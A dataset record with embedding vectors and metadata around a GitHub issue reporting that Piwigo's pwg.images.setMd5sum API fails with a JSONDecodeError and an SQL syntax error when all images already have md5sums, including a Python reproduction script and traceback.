-0.02803248167037964, -0.005335355177521706, -0.01953381486237049, 0.0054009538143873215, -0.010692576877772808, 0.006082450971007347, 0.0111080352216959, 0.011122612282633781, -0.0015133239794522524, 0.0139725087210536, 0.003775565652176738, -0.01285004336386919, -0.006425021681934595, -0.008607998490333557, -0.013469585217535496, -0.022974098101258278, 0.004821499343961477, 0.01223778910934925, 0.0007949278806336224, 0.01807606779038906, 0.0016627430450171232, -0.01717226393520832, -0.01784282736480236, -0.0028808731585741043, 0.013331099413335323, -0.002822563285008073, 0.012696979567408562, 0.008965146727859974, -0.0022558639757335186, -0.0005425553536042571, -0.0168369822204113, -0.001891427207738161, 0.005805478896945715, 0.008054054342210293, -0.021137336269021034, -0.009555533528327942, 0.01603522151708603, 0.02211402729153633, 0.005882010795176029, -0.010094900615513325, 0.004307643510401249, -0.0069862543605268, -0.010852929204702377, 0.0002313035074621439, -0.006490620318800211, -0.02749311551451683, -0.02268254943192005, -0.023615507408976555, -0.006308401934802532, -0.010670710355043411, -0.010102189145982265, 0.03137072175741196, -0.010561379604041576, 0.0066473279148340225, -0.0016645652940496802, -0.009847083128988743, -0.002009869087487459, 0.019256843253970146, 0.0006696527125313878, -0.014249480329453945, 0.018921561539173126, 0.005109404679387808, 0.015481277368962765, 0.002993848640471697, -0.005138559266924858, 0.00006377644604071975, 0.014081839472055435, 0.01682240515947342, 0.006435954477638006, 0.01037187222391367, 0.01725972816348076, 0.003914051689207554, 0.03545241430401802, 0.024081986397504807, 0.0058856550604105, 0.019140223041176796, 0.012325254268944263, 0.0004901675274595618, 0.011800465174019337, -0.008833949454128742, -0.026997480541467667, 0.04956341162323952, -0.006716570816934109, 0.015277191996574402, -0.012186767533421516, 0.0146357836201787, -0.009380604140460491, -0.018819518387317657, -0.013250923715531826, 0.0015014797681942582, 0.026851706206798553, 0.012594937346875668, 0.02156008407473564, -0.010962259955704212, -0.01340398658066988, 0.005040161311626434, 0.005116693209856749, 0.029125792905688286, 0.0011233765399083495, -0.003731833305209875, 0.0006464198231697083, -0.0023068853188306093, -0.004883453715592623, 0.024373535066843033, 0.004781411495059729, -0.003188822418451309, 0.0010841996408998966, 0.0005420998204499483, 0.010459337383508682, -0.009788773953914642, -0.01526261493563652, 0.001132487435825169, -0.007908279076218605, 0.015204304829239845, 0.03711424767971039, -0.008075919933617115, 0.008761061355471611, 0.001822184189222753, 0.021049872040748596, -0.0008013055194169283, -0.020116914063692093, 0.004548172000795603, -0.01066342182457447, 0.005922098644077778, -0.025073254480957985, 0.027566002681851387, -0.02209945023059845, -0.0006541641196236014, 0.02861558087170124, 0.01863001100718975, -0.004256622400134802, -0.0069862543605268, 0.0008883147966116667, -0.00620271498337388, -0.004449774045497179, -0.0046283476985991, 0.003932273481041193, -0.0012235967442393303, 0.012172190472483635, -0.02826572209596634, 0.011873352341353893, -0.007434511557221413, 0.0018522501923143864, 0.01986909657716751 ]
null
null
null
null
null
null
null
null
null
[ "Piwigo", "Piwigo" ]
When all the images in the piwigo_images table have an md5sum value and the pwg.images.setMd5sum API is called, a JSONDecodeError is thrown. Issue is with the call to get_photos_no_md5sum(): https://github.com/Piwigo/Piwigo/blob/562170528c63a2318d153a08ec4847684fa71784/include/ws_functions/pwg.images.php#L2596 I have a fix in my local repo that wraps it in an if statement similar to how this is handled on the admin UI that I'll submit after I figure out pull requests: https://github.com/Piwigo/Piwigo/blob/562170528c63a2318d153a08ec4847684fa71784/admin.php#L290-L295 Sample Code: ``` from piwigo import Piwigo mysite = Piwigo('http://localhost') mysite.pwg.session.login(username="______", password="__________") pwg_token = mysite.pwg.session.getStatus()['pwg_token'] response = mysite.pwg.images.setMd5sum(block_size="20", pwg_token=pwg_token) print(response) ``` Output: ``` nathanz@piwigo-01:~$ python3 piwigo_api_test.py Traceback (most recent call last): File "/home/nathanz/.local/lib/python3.10/site-packages/piwigo/ws.py", line 124, in __call__ result = r.json() File "/usr/lib/python3/dist-packages/requests/models.py", line 900, in json return complexjson.loads(self.text, **kwargs) File "/usr/lib/python3.10/json/__init__.py", line 346, in loads return _default_decoder.decode(s) File "/usr/lib/python3.10/json/decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "/usr/lib/python3.10/json/decoder.py", line 355, in raw_decode raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/nathanz/piwigo_api_test.py", line 8, in <module> response = mysite.pwg.images.setMd5sum(block_size="20", pwg_token=pwg_token) File "/home/nathanz/.local/lib/python3.10/site-packages/piwigo/ws.py", line 96, in checking return fn(self, **kw) File "/home/nathanz/.local/lib/python3.10/site-packages/piwigo/ws.py", line 135, in __call__ raise WsErrorException(r.text) piwigo.ws.WsErrorException: <br /> <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3 in /var/www/html/include/dblayer/functions_mysqli.inc.php:132 Stack trace: #0 /var/www/html/include/dblayer/functions_mysqli.inc.php(132): mysqli-&gt;query() #1 /var/www/html/include/dblayer/functions_mysqli.inc.php(888): pwg_query() #2 /var/www/html/admin/include/functions.php(3294): query2array() #3 /var/www/html/include/ws_functions/pwg.images.php(2602): add_md5sum() #4 /var/www/html/include/ws_core.inc.php(600): ws_images_setMd5sum() #5 /var/www/html/include/ws_protocols/rest_handler.php(41): PwgServer-&gt;invoke() #6 /var/www/html/include/ws_core.inc.php(281): PwgRestRequestHandler-&gt;handleRequest() #7 /var/www/html/ws.php(22): PwgServer-&gt;run() #8 {main} thrown in <b>/var/www/html/include/dblayer/functions_mysqli.inc.php</b> on line <b>132</b><br /> ```
JSONDecodeError when calling pwg.images.setMd5sum API
https://api.github.com/repos/Piwigo/Piwigo/issues/2114/comments
0
2024-02-10T02:48:57
2024-02-10T02:48:57Z
https://github.com/Piwigo/Piwigo/issues/2114
2,128,060,694
2,114
false
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : JSONDecodeError when calling pwg.images.setMd5sum API Issue date: --- start body --- When all the images in the piwigo_images table have an md5sum value and the pwg.images.setMd5sum API is called, a JSONDecodeError is thrown. Issue is with the call to get_photos_no_md5sum(): https://github.com/Piwigo/Piwigo/blob/562170528c63a2318d153a08ec4847684fa71784/include/ws_functions/pwg.images.php#L2596 I have a fix in my local repo that wraps it in an if statement similar to how this is handled on the admin UI that I'll submit after I figure out pull requests: https://github.com/Piwigo/Piwigo/blob/562170528c63a2318d153a08ec4847684fa71784/admin.php#L290-L295 Sample Code: ``` from piwigo import Piwigo mysite = Piwigo('http://localhost') mysite.pwg.session.login(username="______", password="__________") pwg_token = mysite.pwg.session.getStatus()['pwg_token'] response = mysite.pwg.images.setMd5sum(block_size="20", pwg_token=pwg_token) print(response) ``` Output: ``` nathanz@piwigo-01:~$ python3 piwigo_api_test.py Traceback (most recent call last): File "/home/nathanz/.local/lib/python3.10/site-packages/piwigo/ws.py", line 124, in __call__ result = r.json() File "/usr/lib/python3/dist-packages/requests/models.py", line 900, in json return complexjson.loads(self.text, **kwargs) File "/usr/lib/python3.10/json/__init__.py", line 346, in loads return _default_decoder.decode(s) File "/usr/lib/python3.10/json/decoder.py", line 337, in decode obj, end = self.raw_decode(s, idx=_w(s, 0).end()) File "/usr/lib/python3.10/json/decoder.py", line 355, in raw_decode raise JSONDecodeError("Expecting value", s, err.value) from None json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/nathanz/piwigo_api_test.py", line 8, in <module> response = mysite.pwg.images.setMd5sum(block_size="20", pwg_token=pwg_token) File "/home/nathanz/.local/lib/python3.10/site-packages/piwigo/ws.py", line 96, in checking return fn(self, **kw) File "/home/nathanz/.local/lib/python3.10/site-packages/piwigo/ws.py", line 135, in __call__ raise WsErrorException(r.text) piwigo.ws.WsErrorException: <br /> <b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3 in /var/www/html/include/dblayer/functions_mysqli.inc.php:132 Stack trace: #0 /var/www/html/include/dblayer/functions_mysqli.inc.php(132): mysqli-&gt;query() #1 /var/www/html/include/dblayer/functions_mysqli.inc.php(888): pwg_query() #2 /var/www/html/admin/include/functions.php(3294): query2array() #3 /var/www/html/include/ws_functions/pwg.images.php(2602): add_md5sum() #4 /var/www/html/include/ws_core.inc.php(600): ws_images_setMd5sum() #5 /var/www/html/include/ws_protocols/rest_handler.php(41): PwgServer-&gt;invoke() #6 /var/www/html/include/ws_core.inc.php(281): PwgRestRequestHandler-&gt;handleRequest() #7 /var/www/html/ws.php(22): PwgServer-&gt;run() #8 {main} thrown in <b>/var/www/html/include/dblayer/functions_mysqli.inc.php</b> on line <b>132</b><br /> ``` --- end body ---
3,381
[ -0.041666775941848755, 0.023267939686775208, -0.006083056330680847, 0.04552480950951576, 0.023228028789162636, -0.002096974989399314, 0.01999526284635067, 0.030491778627038002, -0.0066451323218643665, 0.0016962048830464482, -0.002617476973682642, -0.00578705221414566, 0.0028419746086001396, 0.022842226549983025, 0.0005845255218446255, -0.009019819088280201, -0.03365802764892578, 0.013968746177852154, -0.01732124574482441, -0.02107285149395466, -0.0009046426275745034, -0.031689099967479706, 0.009199417196214199, 0.024691421538591385, 0.008520935662090778, 0.008241560310125351, -0.017307942733168602, 0.010117363184690475, 0.008640667423605919, 0.001579798641614616, -0.008095220662653446, 0.0009112944244407117, 0.020420975983142853, 0.03993730992078781, 0.048584628850221634, -0.024545082822442055, 0.03924552723765373, 0.04709463194012642, -0.015112853609025478, -0.0013320196885615587, 0.011061917059123516, -0.018704816699028015, -0.01873142458498478, 0.029321063309907913, -0.03493516892194748, 0.005145154893398285, -0.019928744062781334, -0.00027438608231022954, -0.05414552241563797, 0.01581794209778309, -0.012472094967961311, -0.04148052632808685, -0.04286409541964531, -0.05039391666650772, 0.02713927812874317, -0.08003426343202591, 0.022642672061920166, 0.019822316244244576, -0.02398633398115635, -0.012798032723367214, -0.019223656505346298, 0.035733383148908615, 0.020740263164043427, 0.019636066630482674, -0.00025817236746661365, 0.05832284316420555, 0.0063657574355602264, 0.049063559621572495, 0.004652922973036766, 0.0026856577023863792, 0.008288122713565826, 0.013589594513177872, 0.015511960722506046, 0.02360052987933159, 0.032966241240501404, -0.02622133307158947, 0.02860267087817192, 0.06513427197933197, 0.008554194122552872, -0.004253815859556198, -0.0404694527387619, -0.007336917798966169, -0.04267784580588341, 0.010496514849364758, 0.03336535021662712, 0.0033192401751875877, -0.043422844260931015, -0.06561319530010223, -0.009744863957166672, 0.010137318633496761, -0.0023696981370449066, 0.003146293805912137, -0.03139641880989075, 0.006711650174111128, -0.011075220070779324, 0.03488195687532425, -0.009645086713135242, -0.0013935487950220704, -0.005634061060845852, -0.010436649434268475, -0.06444248557090759, -0.017108388245105743, -0.010050845332443714, -0.00578705221414566, 0.019822316244244576, 0.006246025208383799, 0.024970797821879387, -0.02475794032216072, 0.017600620165467262, 0.08051319420337677, 0.016137227416038513, -0.01693544164299965, -0.020540708675980568, -0.012225979007780552, 0.005637386813759804, -0.011587407439947128, 0.005175088066607714, 0.006036493927240372, -0.007190578617155552, 0.017733655869960785, 0.03355159983038902, -0.03458927571773529, -0.021179279312491417, 0.020261334255337715, -0.00015746019198559225, 0.019928744062781334, 0.00519171729683876, 0.01541883498430252, 0.02233668975532055, 0.002607499249279499, -0.02058061957359314, -0.007875712588429451, 0.034562669694423676, -0.0013178846566006541, -0.027618207037448883, 0.017773566767573357, -0.02753838524222374, 0.028203563764691353, 0.05371980741620064, -0.006701672449707985, -0.040549274533987045, -0.044726595282554626, 0.029906420037150383, -0.0024910930078476667, 0.003645177697762847, -0.007297006901353598, 0.02116597630083561, -0.03312588483095169, 0.005238279700279236, -0.006824730429798365, -0.04611016809940338, -0.031502850353717804, -0.003232767106965184, 0.029374277219176292, -0.012678300030529499, -0.011933300644159317, 0.0075231678783893585, 0.028256777673959732, -0.05002141743898392, 0.0006531220278702676, -0.009059729985892773, -0.019875530153512955, 0.004566449671983719, 0.012053032405674458, 0.02087329886853695, 0.022017404437065125, 0.015339014120399952, -0.013982050120830536, 0.008713836781680584, 0.01838553138077259, 0.02777785062789917, -0.05912105739116669, -0.01527249626815319, 0.017334548756480217, -0.004207253456115723, -0.003738302504643798, 0.019090620800852776, -0.01893097721040249, 0.01776026375591755, -0.01649642363190651, -0.013888925313949585, -0.02884213626384735, -0.01658954843878746, -0.026886511594057083, 0.02321472577750683, -0.015791336074471474, 0.008407855406403542, 0.0031213497277349234, 0.038846418261528015, 0.00973156001418829, 0.020460886880755424, -0.03307266905903816, 0.005431181751191616, -0.04129427671432495, 0.0025625997222959995, 0.002288213698193431, -0.04379534721374512, -0.036904096603393555, 0.017347851768136024, -0.018279101699590683, 0.043023739010095596, -0.015498656779527664, -0.04416784644126892, 0.012911112979054451, -0.03599945455789566, 0.023959726095199585, 0.01878463849425316, 0.001357795437797904, 0.006292587611824274, -0.031449634581804276, -0.007110757287591696, -0.017919905483722687, 0.022549547255039215, -0.014141692779958248, 0.0011158367851749063, 0.030491778627038002, 0.017134996131062508, -0.0015640007331967354, -0.03094409964978695, 0.012551916763186455, -0.017334548756480217, -0.011101827025413513, -0.038447313010692596, -0.02010169066488743, -0.03246070444583893, -0.005348034203052521, -0.001308738486841321, 0.0015714840264990926, -0.05297480896115303, 0.018319012597203255, 0.03935195505619049, -0.024159278720617294, 0.003705043578520417, -0.0023630461655557156, 0.0019090620335191488, -0.021924279630184174, 0.010343523696064949, -0.04807909578084946, -0.021831154823303223, 0.01101535465568304, 0.0008547542383894324, 0.03099731355905533, -0.005693926941603422, -0.04557802528142929, 0.03139641880989075, 0.06524069607257843, -0.015884460881352425, 0.02164490520954132, 0.003498838283121586, 0.016602853313088417, -0.03195517137646675, -0.0313166007399559, 0.014620620757341385, 0.008401202969253063, -0.009658390656113625, 0.019303476437926292, 0.006675065029412508, 0.007636248134076595, 0.006891248282045126, -0.042491596192121506, 0.015392228029668331, 0.025955261662602425, -0.03799499198794365, 0.001546539831906557, 0.05302802100777626, 0.01174705009907484, -0.021684816107153893, 0.0012222653022035956, -0.0011557474499568343, -0.035201240330934525, 0.008713836781680584, 0.0035919633228331804, -0.04384855926036835, -0.018797941505908966, -0.014367853291332722, -0.0013029181864112616, -0.011234862729907036, -0.001188174937851727, 0.00693115871399641, 0.012059684842824936, 0.011454371735453606, -0.017680441960692406, 0.011840175837278366, 0.03206159919500351, 0.029028385877609253, 0.032034993171691895, 0.015511960722506046, -0.006631828844547272, -0.04145391657948494, -0.005321427248418331, -0.021471958607435226, 0.027458563446998596, -0.024784546345472336, -0.01717490702867508, -0.005670645739883184, 0.017933210358023643, -0.0027355460915714502, 0.06332498043775558, -0.00798214040696621, 0.02213713712990284, -0.03184874355792999, -0.011234862729907036, -0.03317909687757492, 0.04073552414774895, -0.0373564176261425, -0.01432794239372015, 0.007077498361468315, 0.008354640565812588, 0.003257711185142398, 0.0041274321265518665, 0.03288641944527626, -0.027219099923968315, -0.014115085825324059, -0.010829104110598564, -0.024398744106292725, 0.02958713471889496, 0.020953118801116943, 0.007922274991869926, 0.013090711086988449, -0.001529078814201057, 0.011447720229625702, 0.02715258300304413, -0.046535879373550415, 0.0014068522723391652, -0.014820174314081669, -0.03775552660226822, -0.04435409605503082, 0.007336917798966169, -0.023973029106855392, -0.013283612206578255, 0.005241605918854475, -0.036371953785419464, -0.014407764188945293, -0.005530958529561758, -0.005956672597676516, -0.0541987344622612, -0.021046245470643044, 0.024598296731710434, -0.006695020478218794, 0.006009886972606182, 0.01245879102498293, 0.001698699314147234, 0.012798032723367214, -0.011101827025413513, 0.03876659646630287, -0.015086245723068714, -0.02525017224252224, 0.016669370234012604, 0.021538477391004562, -0.029454099014401436, 0.0008580801077187061, 0.02266927994787693, -0.034908562898635864, 0.0525490939617157, -0.02622133307158947, -0.046828560531139374, 0.01911722682416439, 0.014833478257060051, -0.0058768512681126595, -0.03136981278657913, -0.0012663333909586072, -0.024930886924266815, 0.01926356554031372, -0.008813614025712013, 0.028629278764128685, 0.03727659583091736, -0.0012230967404320836, -0.024145975708961487, 0.0013694360386580229, -0.05124534294009209, 0.010163925588130951, 0.034855347126722336, -0.030491778627038002, 0.017148299142718315, -0.04557802528142929, 0.012824639678001404, 0.04525873810052872, 0.017254726961255074, -0.010469907894730568, 0.025276778265833855, -0.021032940596342087, -0.013356782495975494, -0.0010601280955597758, -0.0074167391285300255, 0.02145865559577942, 0.007363524753600359, 0.007509863935410976, 0.0018358923261985183, 0.01585785299539566, -0.00790231954306364, -0.008527587167918682, 0.013203791342675686, -0.007642899639904499, -0.08673926442861557, -0.019862227141857147, 0.031742312014102936, -0.009931113570928574, 0.0036318739876151085, -0.013982050120830536, -0.016709281131625175, 0.040283203125, -0.04092177376151085, -0.024438655003905296, 0.03985748812556267, -0.0023813387379050255, 0.012013121508061886, 0.018305709585547447, -0.03059820644557476, 0.02753838524222374, 0.0012763109989464283, -0.025516243651509285, 0.035706777125597, -0.017587317153811455, 0.00445004366338253, 0.01591106690466404, 0.03392409905791283, 0.010895621962845325, 0.005464440677314997, -0.032726775854825974, 0.005890154745429754, -0.0067449091002345085, 0.02261606603860855, -0.008208301849663258, 0.01653633452951908, -0.005141829140484333, -0.05318766459822655, -0.027804456651210785, 0.03419017046689987, 0.07002998143434525, 0.012758121825754642, 0.009345756843686104, 0.008627363480627537, 0.02316151186823845, 0.01374258566647768, -0.010303613729774952, -0.0001284625759581104, -0.03623891994357109, -0.03054499253630638, 0.0034289946779608727, -0.016523031517863274, 0.009026470594108105, 0.018159370869398117, -0.07237140834331512, -0.003008269239217043, -0.0018558477750048041, 0.0029217961709946394, 0.0017760263290256262, 0.01847865618765354, 0.014660531654953957, -0.028283385559916496, 0.00848767627030611, -0.012678300030529499, -0.014753656461834908, -0.04057588055729866, -0.02277570776641369, -0.005983279552310705, -0.04996820166707039, 0.00525490939617157, 0.023706957697868347, 0.005567543208599091, -0.0075165159069001675, -0.000009211162250721827, -0.023866601288318634, -0.002755501540377736, 0.03871338441967964, -0.01287120208144188, 0.001947309821844101, -0.004446717444807291, 0.00709080183878541, -0.026088297367095947, -0.0162968710064888, -0.006581940222531557, 0.04462016746401787, 0.031981777399778366, -0.019436512142419815, 0.018904369324445724, -0.027378743514418602, 0.01838553138077259, 0.0020520754624158144, 0.014381157234311104, 0.003274340648204088, -0.046482667326927185, -0.011168344877660275, 0.01065615750849247, 0.0037682356778532267, 0.003748280229046941, 0.0011017017532140017, -0.012332407757639885, -0.013483165763318539, 0.019596155732870102, -0.013296916149556637, -0.0014101782580837607, -0.02383999340236187, -0.02860267087817192, 0.0018641625065356493, -0.008234908804297447, -0.02261606603860855, -0.00020246367785148323, 0.018558477982878685, -0.04555141553282738, 0.05938712880015373, -0.01781347766518593, 0.020128298550844193, -0.00985129177570343, 0.06412319839000702, -0.037436239421367645, -0.0075165159069001675, 0.03025231324136257, 0.005281516350805759, -0.008042006753385067, -0.004077543504536152, -0.0062493509612977505, -0.026101600378751755, -0.02495749294757843, -0.011773657985031605, -0.02310829795897007, 0.01906401291489601, -0.03818124160170555, 0.0435824878513813, 0.02505061775445938, 0.007569730281829834, -0.03780873864889145, 0.00936571229249239, 0.020859993994235992, -0.00631254306063056, -0.02729892171919346, 0.004097498953342438, 0.00531477527692914, -0.01638999581336975, -0.008906738832592964, -0.011401157826185226, -0.002090323017910123, -0.005241605918854475, 0.03653159737586975, -0.010649506002664566, 0.018265798687934875, 0.0035287714563310146, -0.028256777673959732, 0.002397968200966716, 0.018811244517564774, -0.017161602154374123, 0.016868924722075462, -0.020740263164043427, -0.00037728087045252323, -0.015631692484021187, 0.021152673289179802, -0.016523031517863274, 0.02116597630083561, -0.0013062440557405353, -0.0038081463426351547, 0.011840175837278366, -0.0061495741829276085, 0.021445350721478462, 0.004925645887851715, -0.018066246062517166, 0.021804548799991608, 0.027910886332392693, 0.018811244517564774, -0.020833387970924377, -0.0035221197176724672, -0.013636156916618347, 0.026686957105994225, 0.01990213803946972, -0.02237660065293312, 0.023228028789162636, 0.0038281017914414406, -0.04121445491909981, 0.014407764188945293, -0.00531477527692914, -0.0015640007331967354, 0.01620374619960785, -0.0043037040159106255, -0.021631602197885513, -0.012831291183829308, -0.01062955055385828, 0.028230171650648117, -0.013822407461702824, 0.010449952445924282, -0.01936999522149563, -0.02646079659461975, 0.014061870984733105, -0.020793477073311806, -0.02626124396920204, 0.05544926971197128, 0.0286558847874403, 0.0002806221309583634, 0.016190441325306892, -0.020154904574155807, 0.015152763575315475, -0.028389813378453255, 0.008906738832592964, 0.0024129345547407866, -0.02713927812874317, 0.007463301531970501, 0.02574240416288376, 0.01635008491575718, -0.008241560310125351, -0.004356918390840292, 0.02457169070839882, 0.001887443708255887, -0.03251392021775246, 0.0015432138461619616, 0.011520889587700367, -0.029933027923107147, -0.008720489218831062, 0.004233860410749912, 0.012339059263467789, 0.013217094354331493, -0.013875621370971203, -0.012006470002233982, 0.009558613412082195, 0.002077019540593028, 0.03035874292254448, -0.017973121255636215, 0.0008015399798750877, 0.0034007246140390635, 0.03429659828543663, 0.019236959517002106, -0.01624365709722042, 0.008135131560266018, 0.015578478574752808, -0.04398159682750702, 0.0147403534501791, 0.00041698370478115976, 0.003206159919500351, 0.025409813970327377, 0.00036605598870664835, 0.01274481788277626, -0.007742676418274641, -0.024584993720054626, -0.01668267510831356, -0.02184445783495903, 0.01600419171154499, -0.04539177566766739, -0.018505262210965157, 0.0022216958459466696, 0.002965032821521163, 0.0037216730415821075, -0.02622133307158947, -0.004902364686131477, -0.02972017042338848, 0.002389653353020549, 0.005045378115028143, 0.0660921260714531, -0.022389905527234077, -0.022682582959532738, 0.0053613376803696156, 0.004307030234485865, 0.039378561079502106, 0.020314548164606094, -0.06364426761865616, -0.02105954848229885, 0.012538612820208073, 0.022695887833833694, 0.0240794587880373, -0.012259237468242645, 0.020314548164606094, 0.030465170741081238, -0.01722812093794346, -0.052229806780815125, 0.01517937146127224, -0.003267688909545541, -0.009019819088280201, 0.0021318967919796705, 0.029400885105133057, 0.004253815859556198, 0.01576472818851471, 0.009917809627950191, 0.039671238511800766, 0.009665042161941528, 0.03312588483095169, -0.05010123550891876, -0.004752699751406908, 0.022403208538889885, 0.0030631464906036854, -0.006957766134291887, -0.017055174335837364, -0.00017336211749352515, -0.009492095559835434, -0.02173803001642227, -0.017427673563361168, 0.01576472818851471, -0.004164016805589199, 0.0081484355032444, -0.03836749121546745, 0.0038912936579436064, 0.006103011779487133, -0.009398970752954483, 0.0012097932631149888, -0.02525017224252224, 0.008999863639473915, 0.009112943895161152, 0.014966513961553574, 0.032673563808202744, 0.011208255775272846, 0.0026440841611474752, 0.025263475254178047, -0.013689371757209301, -0.05619427189230919, 0.014407764188945293, -0.06497462838888168, -0.00992446206510067, 0.01274481788277626, 0.020500797778367996, -0.00410082470625639, 0.028522849082946777, -0.00861406046897173, -0.020514102652668953, 0.007097453344613314, 0.009911158122122288, 0.007203882094472647, 0.03041195683181286, -0.011767005547881126, 0.03059820644557476, -0.005504351109266281, 0.00936571229249239, -0.0055608912371098995, 0.008181693963706493, -0.02277570776641369, 0.00022636853100266308, -0.019489727914333344, -0.007084149867296219, -0.06912533938884735, -0.023520708084106445, -0.007889015600085258, -0.024984100833535194, 0.010955488309264183, 0.022150440141558647, 0.024451958015561104, 0.012305800803005695, -0.03408374264836311, -0.005151806864887476, 0.007636248134076595, 0.02072695828974247, -0.007483256980776787, 0.030757850036025047, -0.003984418697655201, -0.025502940639853477, -0.01193995214998722, 0.024358833208680153, -0.018651602789759636, -0.03429659828543663, 0.00429372675716877, -0.029613742604851723, -0.04350266605615616, -0.009778122417628765, 0.003884641919285059, 0.03376445546746254, -0.005740489810705185, -0.017693744972348213, 0.028256777673959732, 0.007988792844116688, 0.018013030290603638, -0.014381157234311104, -0.015511960722506046, -0.017893299460411072, 0.0185850840061903, -0.014979817904531956, 0.03206159919500351, -0.025316689163446426, 0.013330175541341305, 0.00939231924712658, -0.011088524013757706, -0.007177275139838457, 0.010676112957298756, 0.005165110342204571, -0.014434371143579483, 0.02772463485598564, 0.014341246336698532, -0.013982050120830536, 0.00267568021081388, 0.021817851811647415, -0.025423118844628334, 0.008208301849663258, 0.004965556785464287, -0.017627228051424026, -0.019343387335538864, 0.0031296643428504467, -0.024558385834097862, 0.011560800485312939, -0.04972873628139496, -0.016523031517863274, 0.001509954920038581, 0.04956909269094467, 0.01887776330113411, -0.009611828252673149, 0.007543122861534357, 0.0003716684295795858, -0.007290355395525694, -0.02345419116318226, -0.015578478574752808, -0.03214142099022865, -0.00022096394968684763, -0.013835710473358631, 0.013689371757209301, -0.00897990819066763, 0.015684906393289566, -0.022349994629621506, -0.008693881332874298, -0.0037582579534500837, 0.010975443758070469, -0.023720262572169304, 0.021032940596342087, -0.03280659765005112, -0.049888379871845245, -0.0064389267936348915, -0.029267849400639534, -0.007350221276283264, -0.024398744106292725, 0.040655702352523804, -0.0032610371708869934, -0.025755707174539566, -0.016030799597501755, -0.013755889609456062, -0.007210534065961838, 0.027405349537730217, -0.008421158418059349, -0.00737017672508955, -0.011088524013757706, -0.001339502981863916, -0.0390060618519783, 0.048717666417360306, -0.017201513051986694, -0.01990213803946972, -0.017587317153811455, -0.01150758657604456, -0.004356918390840292, 0.022416511550545692, 0.027644814923405647, 0.014820174314081669, 0.004726092331111431, -0.017294637858867645, -0.02900177799165249, 0.0041108024306595325, 0.006951114162802696, 0.009691649116575718, -0.005956672597676516, -0.036026060581207275, -0.03709034621715546, 0.012053032405674458, 0.012904460541903973, -0.013283612206578255, -0.0033292178995907307, 0.0032244522590190172, 0.014846782200038433, -0.0022433141712099314, -0.021192584186792374, 0.011141737923026085, 0.0006701672100462019, 0.02913481369614601, 0.029853206127882004, 0.01259847916662693, -0.015472049824893475, 0.024744637310504913, -0.012425532564520836, -0.016310174018144608, 0.0009570254478603601, 0.031077135354280472, -0.018265798687934875, 0.007157319691032171, -0.022150440141558647, -0.003108046017587185, -0.03371123969554901, -0.0013860655017197132, 0.04398159682750702, -0.016908835619688034, 0.011367898434400558, -0.031502850353717804, -0.00027230739942751825, -0.0023730238899588585, 0.009159506298601627, -0.02534329704940319, 0.059866055846214294, -0.00369839183986187, -0.02277570776641369, -0.010476559400558472, 0.0008622374734841287, 0.0013902228092774749, -0.016376692801713943, -0.015977585688233376, -0.019489727914333344, -0.025769012048840523, -0.03248731419444084, -0.007975488901138306, -0.02082008309662342, -0.04124106094241142, 0.017347851768136024, -0.010716023854911327, -0.03206159919500351, 0.04121445491909981, 0.0209664236754179, -0.013143924996256828, -0.03905927389860153, 0.0059766280464828014, 0.006768190301954746, 0.004925645887851715, 0.002836985979229212, -0.01337673794478178, -0.03184874355792999, 0.0034422981552779675, 0.006029842421412468, -0.01026370283216238, -0.012013121508061886, 0.015285799279808998, 0.02724570780992508, 0.0037316507659852505, 0.029267849400639534, -0.0039378562942147255, 0.0209664236754179, 0.008381247520446777, 0.03847391903400421, -0.029294457286596298, -0.010709372349083424, 0.02257615514099598, -0.01746758446097374, -0.03312588483095169, 0.003144630929455161, 0.00401435187086463, 0.011800264939665794, 0.023374369367957115, -0.031502850353717804, 0.031263384968042374, 0.0011665566125884652, 0.024890976026654243, 0.034855347126722336, -0.0029035035986453295, -0.011361246928572655, -0.03275338560342789, -0.0020836712792515755, 0.008075266145169735, 0.02004847675561905, -0.010669461451470852, -0.027644814923405647, -0.01535231713205576, 0.010323569178581238, -0.050766415894031525, -0.012319103814661503, -0.005727185867726803, -0.01708178222179413, -0.0020520754624158144, 0.02884213626384735, -0.015565174631774426, -0.009904506616294384, -0.019476423040032387, 0.004938949830830097, -0.017879994586110115, -0.006818078458309174, -0.024584993720054626, -0.011673880741000175, -0.025356600061058998, -0.02286883257329464, -0.0027505126781761646, 0.01620374619960785, -0.009897854179143906, -0.012279192917048931, 0.027086064219474792, -0.02140544168651104, -0.016656067222356796, -0.02559606544673443, 0.006272632163017988, 0.005823636893182993, -0.007057542912662029, -0.01936999522149563, -0.0015033031813800335, -0.025529546663165092, 0.03248731419444084, -0.006991025060415268, -0.004460021387785673, -0.028576064854860306, -0.0037316507659852505, 0.03775552660226822, -0.006259328685700893, 0.002625791821628809, 0.004795936401933432, -0.01863829791545868, 0.018225887790322304, 0.00992446206510067, -0.02393311820924282, -0.028203563764691353, 0.008281471207737923, -0.03770231083035469, -0.030811063945293427, 0.05175087973475456, -0.018598388880491257, 0.016762495040893555, -0.012611782178282738, -0.007875712588429451, 0.013928835280239582, -0.01737445965409279, -0.02972017042338848, -0.013469862751662731, -0.016217049211263657, 0.035839810967445374, -0.04203927516937256, -0.0043037040159106255, -0.024784546345472336, -0.018864460289478302, -0.023866601288318634, -0.029347671195864677, -0.016017496585845947, -0.02111276239156723, -0.012984282337129116, -0.001697036437690258, -0.03695731237530708, 0.02958713471889496, 0.012618434615433216, -0.012704906985163689, 0.027272313833236694, -0.017347851768136024, -0.011201604269444942, -0.020301245152950287, 0.0034040503669530153, 0.03136981278657913, -0.02592865377664566, -0.003098068293184042, -0.005447810981422663, -0.005175088066607714, 0.005920087918639183, 0.005035400390625, 0.009585220366716385, -0.014021961018443108, -0.020899904891848564, -0.009006515145301819, -0.039431776851415634, -0.009571917355060577, 0.0016554627800360322, -0.034855347126722336, 0.006891248282045126, 0.01379579957574606, 0.0015939337899908423, 0.0005462777335196733, -0.01228584535419941, 0.006029842421412468, -0.011028657667338848, -0.030039455741643906, -0.03216802701354027, -0.00044483804958872497, -0.024145975708961487, 